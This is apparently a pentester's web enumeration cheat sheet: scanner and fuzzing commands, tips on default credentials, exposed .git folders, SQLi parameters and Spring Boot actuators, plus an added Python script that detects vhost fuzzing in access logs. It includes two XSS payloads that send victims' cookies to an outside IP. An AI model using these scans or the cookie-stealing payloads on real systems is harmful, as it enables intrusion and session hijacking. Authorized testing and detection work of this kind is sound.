Enumeration
Tools to run:
nikto -host URL:PORT -C all
feroxbuster -u URL:PORT -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o OUTPUT.txt
gobuster dir -u URL:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
wpscan --url URL:PORT --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive
whatweb --color=never --no-errors -a 3 -v URL:PORT
wkhtmltoimage --format png URL:PORT OUTPUT.png
curl -sSikf URL:PORT/robots.txt
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://URL -H "Host: FUZZ.URL" -fs 7069 # 7069 = response size for the original Host header (the default vhost); filter it out so only differing responses remain
Vhost Enum:
# msf
use auxiliary/scanner/http/vhost_scanner
# ffuf
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://amzcorp.local -H "Host: FUZZ.amzcorp.local" -fs 86
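Defender-side counterpart to the vhost brute-force above, added here and not part of the original notes: each wordlist entry becomes a request with a different Host header, and unknown names all get the same default-vhost response size (86 bytes in the example). The script below flags that pattern in access logs; the log format (nginx-style with $host appended as the last field), IPs and hostnames are constructed assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed sample access-log lines (not real traffic). Assumes an nginx
# log_format that appends the Host header as the final quoted field.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 86 "-" "curl/8.0" "admin.amzcorp.local"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 86 "-" "curl/8.0" "dev.amzcorp.local"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 86 "-" "curl/8.0" "test.amzcorp.local"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 86 "-" "curl/8.0" "mail.amzcorp.local"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 86 "-" "curl/8.0" "www2.amzcorp.local"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 7069 "-" "curl/8.0" "amzcorp.local"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 7069 "-" "Mozilla/5.0" "amzcorp.local"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /about HTTP/1.1" 200 4120 "-" "Mozilla/5.0" "amzcorp.local"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
    r'(?P<size>\d+|-) "[^"]*" "[^"]*" "(?P<host>[^"]*)"$'
)

def parse_lines(lines):
    """Yield (client_ip, host_header, status, size) for lines matching the format."""
    for line in lines:
        m = LINE_RE.match(line.rstrip("\n"))
        if m:
            yield m.group("ip"), m.group("host"), m.group("status"), m.group("size")

def flag_vhost_fuzzing(lines, min_hosts=5, min_same_size_ratio=0.8):
    """Return {ip: details} for clients that sent many distinct Host values and
    received mostly identical-size responses (the default-vhost signature)."""
    hosts = defaultdict(set)
    sizes = defaultdict(Counter)
    for ip, host, _status, size in parse_lines(lines):
        hosts[ip].add(host)
        sizes[ip][size] += 1
    findings = {}
    for ip, seen in hosts.items():
        if len(seen) < min_hosts:
            continue
        size, hits = sizes[ip].most_common(1)[0]
        total = sum(sizes[ip].values())
        if hits / total >= min_same_size_ratio:
            findings[ip] = {"distinct_hosts": len(seen), "default_size": size,
                            "default_hits": hits, "requests": total}
    return findings

if __name__ == "__main__":
    for ip, info in flag_vhost_fuzzing(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {info}")
```

Tune min_hosts and the size ratio to the site: a real multi-tenant host with many legitimate vhosts per client will need a higher threshold or a per-time-window count.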
Look for:
Default Credentials / Shit Credentials, e.g. webapp name: nexus:nexus
Comments in code that give information / paths
Web App version - then check in Google/searchsploit
.Git folder -> GitTools (GitDumper.sh URL/.git/ OUTPUT && git checkout -- .)
Someone checking the application:
<img src=x onerror="this.src='http://192.168.49.73/?'+document.cookie; this.removeAttribute('onerror');">
<script type="text/javascript">document.location="http://IP:PORT/?c="+document.cookie;</script>
Exploits
Look for the following in the URL:
URL/id=
Parameters like this are candidates for SQLi and PHP wrappers / file inclusion
Spring Boot:
Look for exposed endpoints such as /actuator